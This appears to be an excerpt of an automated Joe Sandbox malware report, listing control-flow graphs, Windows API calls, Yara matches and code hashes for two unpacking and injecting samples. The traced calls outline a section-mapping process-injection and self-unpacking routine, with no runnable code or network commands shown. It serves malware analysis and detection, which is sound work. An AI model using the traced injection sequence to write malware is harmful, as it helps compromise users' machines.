                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_haevsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 285 4015c4-4015db NtDuplicateObject 274->285 275->276 282 4018c5 276->282 283 4018bc-4018e3 call 401193 276->283 282->283 285->275 287 4015e1-401605 NtCreateSection 285->287 288 401661-401687 NtCreateSection 287->288 289 401607-401628 NtMapViewOfSection 287->289 288->275 291 40168d-401691 288->291 289->288 293 40162a-401646 NtMapViewOfSection 289->293 291->275 294 401697-4016b8 NtMapViewOfSection 291->294 293->288 296 401648-40165e 293->296 294->275 297 4016be-4016da NtMapViewOfSection 294->297 296->288 297->275 299 4016e0 call 4016e5 297->299
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_haevsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_haevsid.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0
                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 25b003c-25b0047 1 25b0049 0->1 2 25b004c-25b0263 call 25b0a3f call 25b0e0f call 25b0d90 VirtualAlloc 0->2 1->2 17 25b028b-25b0292 2->17 18 25b0265-25b0289 call 25b0a69 2->18 20 25b02a1-25b02b0 17->20 22 25b02ce-25b03c2 VirtualProtect call 25b0cce call 25b0ce7 18->22 20->22 23 25b02b2-25b02cc 20->23 29 25b03d1-25b03e0 22->29 23->20 30 25b0439-25b04b8 VirtualFree 29->30 31 25b03e2-25b0437 call 25b0ce7 29->31 33 25b04be-25b04cd 30->33 34 25b05f4-25b05fe 30->34 31->29 36 25b04d3-25b04dd 33->36 37 25b077f-25b0789 34->37 38 25b0604-25b060d 34->38 36->34 41 25b04e3-25b0505 36->41 42 25b078b-25b07a3 37->42 43 25b07a6-25b07b0 37->43 38->37 39 25b0613-25b0637 38->39 44 25b063e-25b0648 39->44 54 25b0517-25b0520 41->54 55 25b0507-25b0515 41->55 42->43 45 25b086e-25b08be LoadLibraryA 43->45 46 25b07b6-25b07cb 43->46 44->37 48 25b064e-25b065a 44->48 53 25b08c7-25b08f9 45->53 47 25b07d2-25b07d5 46->47 50 25b07d7-25b07e0 47->50 51 25b0824-25b0833 47->51 48->37 52 25b0660-25b066a 48->52 57 25b07e2 50->57 58 25b07e4-25b0822 50->58 60 25b0839-25b083c 51->60 59 25b067a-25b0689 52->59 61 25b08fb-25b0901 53->61 62 25b0902-25b091d 53->62 56 25b0526-25b0547 54->56 55->56 63 25b054d-25b0550 56->63 57->51 58->47 64 25b068f-25b06b2 59->64 65 25b0750-25b077a 59->65 60->45 66 25b083e-25b0847 60->66 61->62 68 25b05e0-25b05ef 63->68 69 25b0556-25b056b 63->69 70 25b06ef-25b06fc 64->70 71 25b06b4-25b06ed 64->71 65->44 72 25b084b-25b086c 66->72 73 25b0849 66->73 68->36 74 25b056f-25b057a 69->74 75 25b056d 69->75 76 25b074b 70->76 77 25b06fe-25b0748 70->77 71->70 72->60 73->45 78 25b059b-25b05bb 74->78 79 25b057c-25b0599 74->79 75->68 76->59 77->76 84 25b05bd-25b05db 78->84 79->84 84->63
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 025B024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1970451441.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_25b0000_haevsid.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 4b78ccde5262370ef2ce6d89914bcf3178e9d6056a566947f6f95aa948e59ef1
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: 62526974A01229DFDB65CF68C984BADBBB1BF09314F1480D9E54DAB391DB30AA85CF14

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 319 274f239-274f252 320 274f254-274f256 319->320 321 274f25d-274f269 CreateToolhelp32Snapshot 320->321 322 274f258 320->322 323 274f279-274f286 Module32First 321->323 324 274f26b-274f271 321->324 322->321 325 274f28f-274f297 323->325 326 274f288-274f289 call 274eef8 323->326 324->323 331 274f273-274f277 324->331 329 274f28e 326->329 329->325 331->320 331->323
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0274F261
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0274F281
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1970758383.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_273d000_haevsid.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: a3f7684f4873a7fbee6c0e65249e59984d5fed249171deab2a0584f643b2db1d
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: B7F096362007246BE7203BF9988CB6F76ECBF49764F501628EA52D18C0DF70E8454AA2

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 332 25b0e0f-25b0e24 SetErrorMode * 2 333 25b0e2b-25b0e2c 332->333 334 25b0e26 332->334 334->333
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,025B0223,?,?), ref: 025B0E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,025B0223,?,?), ref: 025B0E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1970451441.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_25b0000_haevsid.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: 8f6d2e30e3af7fa99cae600574b5a2077abbbd3ebbb0e80a8fe1475a88e7ad37
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: 55D0123514512877D7012A94DC09BCE7F1CDF05B66F008011FB0DD9080C770954046E9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_haevsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_haevsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_haevsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_haevsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 444 274eef8-274ef32 call 274f20b 447 274ef34-274ef67 VirtualAlloc call 274ef85 444->447 448 274ef80 444->448 450 274ef6c-274ef7e 447->450 448->448 450->448
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0274EF49
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1970758383.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_273d000_haevsid.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: 381bbfa419481ab4a74cd757a13a0871ecd0ef4d871b9e7a26d5b7eebf6458a2
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 7D110B79A00208EFDB01DF98C985E99BBF5BF08751F158094F948AB361D771EA50DF90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_haevsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                                                        Execution Graph

                                                                        Execution Coverage:4.6%
                                                                        Dynamic/Decrypted Code Coverage:78.1%
                                                                        Signature Coverage:4.7%
                                                                        Total number of Nodes:64
                                                                        Total number of Limit Nodes:3
                                                                        execution_graph 12179 403043 12180 40319a 12179->12180 12181 40306d 12179->12181 12181->12180 12182 403128 RtlCreateUserThread NtTerminateProcess 12181->12182 12182->12180 12183 850456 12184 850465 12183->12184 12187 850bf6 12184->12187 12186 85046e 12188 850c11 12187->12188 12189 850c1a CreateToolhelp32Snapshot 12188->12189 12190 850c36 Module32First 12188->12190 12189->12188 12189->12190 12191 850c45 12190->12191 12192 850c4b 12190->12192 12194 8508b5 12191->12194 12192->12186 12195 8508e0 12194->12195 12196 8508f1 VirtualAlloc 12195->12196 12197 850929 12195->12197 12196->12197 12197->12197 12198 402f16 12199 402f1a 12198->12199 12201 402fa2 12199->12201 12202 401991 12199->12202 12203 4019a0 12202->12203 12204 4019d8 Sleep 12203->12204 12206 4019f3 12204->12206 12207 4014c4 12204->12207 12206->12201 12208 4014d3 12207->12208 12209 401660 NtDuplicateObject 12208->12209 12218 401571 12208->12218 12210 40167d NtCreateSection 12209->12210 12209->12218 12211 4016a3 NtMapViewOfSection 12210->12211 12212 4016fd NtCreateSection 12210->12212 12211->12212 12213 4016c6 NtMapViewOfSection 12211->12213 12214 401729 12212->12214 12212->12218 12213->12212 12215 4016e4 12213->12215 12216 401733 NtMapViewOfSection 12214->12216 12214->12218 12215->12212 12217 40175a NtMapViewOfSection 12216->12217 12216->12218 12217->12218 12218->12206 12219 61003c 12220 610049 12219->12220 12232 610e0f SetErrorMode SetErrorMode 12220->12232 12225 610265 12226 6102ce VirtualProtect 12225->12226 12228 61030b 12226->12228 12227 610439 VirtualFree 12231 6104be LoadLibraryA 12227->12231 12228->12227 12230 6108c7 12231->12230 12233 610223 12232->12233 12234 610d90 12233->12234 12235 610dad 12234->12235 12236 610dbb GetPEB 12235->12236 12237 610238 VirtualAlloc 12235->12237 12236->12237 12237->12225 12238 4339bc 12240 4339c8 __mtinitlocknum 12238->12240 12244 435051 HeapCreate 12240->12244 12241 433a35 8 library calls 12245 431540 12241->12245 12243 433ad6 __mtinitlocknum 12244->12241 12247 431bef __wfopen_s _free __realloc_crt __floor_pentium4 12245->12247 12249 4311b0 12247->12249 12251 4311e0 _strlen 12249->12251 12250 4312d1 LocalAlloc 12252 431301 VirtualProtect 12250->12252 12251->12250 12254 431378 12252->12254 12255 4314f2 LoadLibraryA 12254->12255 12256 43152e 12255->12256 12256->12243

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 69 431540-431be9 70 431c8a-431c96 69->70 71 431bef-431c87 call 432f7d call 43352a call 433376 call 432970 call 433410 call 433150 call 432e60 69->71 72 431c98-431cad 70->72 71->70 78 431cb8-431cbe 72->78 79 431caf-431cb6 72->79 80 431cc0-431cc6 78->80 79->72 79->78 81 431cd4-431cda 80->81 82 431cc8 80->82 84 431ce5-431cf1 call 4311b0 81->84 85 431cdc-431ce3 81->85 82->81 88 431cf6-431d01 84->88 85->80 85->84 90 431d06-431d0c 88->90 92 431d1a-431d1b 90->92 93 431d0e-431d16 90->93 92->90 95 431d1d-431d25 92->95 93->92
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00431C2A
                                                                          • Part of subcall function 0043352A: _malloc.LIBCMT ref: 00433538
                                                                        • __wfopen_s.LIBCMT ref: 00431C44
                                                                          • Part of subcall function 00433150: __indefinite.LIBCMT ref: 004349D0
                                                                        • __floor_pentium4.LIBCMT ref: 00431C80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: __floor_pentium4__indefinite__wfopen_s_free_malloc
                                                                        • String ID: F:$&mm$0.txt$=KnH$R`$VD[E$aYX$s6.s$wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez
                                                                        • API String ID: 3889868452-3505399015
                                                                        • Opcode ID: d99e9b8741b22aa99d10b1caa619cc7040c5bc56d361daa6ff3a0b13eea6f9e9
                                                                        • Instruction ID: ad96a9d43ed1917ae2a70b0bafe91b8a3833c5c9e6e88e4928b445b74cbf9755
                                                                        • Opcode Fuzzy Hash: d99e9b8741b22aa99d10b1caa619cc7040c5bc56d361daa6ff3a0b13eea6f9e9
                                                                        • Instruction Fuzzy Hash: 0A022DB5609380CFD2708F6AC589B8FF7E4BF85714F10891DE6DA5A620DB3088858F57

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 192 4014c4-4014f6 198 4014f9-40150d call 401240 192->198 203 401512-401513 198->203 204 401544-401545 203->204 205 401515-401528 203->205 206 401547 204->206 207 4015bd-4015d4 204->207 205->198 208 40152a-401535 205->208 209 401596-4015a6 206->209 210 401549-40154b 206->210 208->203 212 401537-401543 208->212 213 4015a8 209->213 210->213 214 40154d-40156d 210->214 212->204 216 4015e7-40160a call 401240 214->216 217 40156f 214->217 226 40160c 216->226 227 40160f-401614 216->227 219 401571 217->219 220 4015e2-4015e3 217->220 220->216 226->227 229 40161a-40162b 227->229 230 40193e-401946 227->230 233 401631-40165a 229->233 234 40193c 229->234 230->227 235 40194b-40198e call 401240 230->235 233->234 243 401660-401677 NtDuplicateObject 233->243 234->235 243->234 245 40167d-4016a1 NtCreateSection 243->245 247 4016a3-4016c4 NtMapViewOfSection 245->247 248 4016fd-401723 NtCreateSection 245->248 247->248 249 4016c6-4016e2 NtMapViewOfSection 247->249 248->234 250 401729-40172d 248->250 249->248 252 4016e4-4016fa 249->252 250->234 253 401733-401754 NtMapViewOfSection 250->253 252->248 253->234 255 40175a-401776 NtMapViewOfSection 253->255 255->234 258 40177c 255->258 258->234 260 40177c call 401781 258->260 260->234
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                        • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                        • Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                        • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 261 4015d5-4015e4 263 4015f4 261->263 264 4015eb-4015f0 261->264 263->264 265 4015f7-40160a call 401240 263->265 264->265 268 40160c 265->268 269 40160f-401614 265->269 268->269 271 40161a-40162b 269->271 272 40193e-401946 269->272 275 401631-40165a 271->275 276 40193c 271->276 272->269 277 40194b-40198e call 401240 272->277 275->276 285 401660-401677 NtDuplicateObject 275->285 276->277 285->276 287 40167d-4016a1 NtCreateSection 285->287 289 4016a3-4016c4 NtMapViewOfSection 287->289 290 4016fd-401723 NtCreateSection 287->290 289->290 291 4016c6-4016e2 NtMapViewOfSection 289->291 290->276 292 401729-40172d 290->292 291->290 294 4016e4-4016fa 291->294 292->276 295 401733-401754 NtMapViewOfSection 292->295 294->290 295->276 297 40175a-401776 NtMapViewOfSection 295->297 297->276 300 40177c 297->300 300->276 302 40177c call 401781 300->302 302->276
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
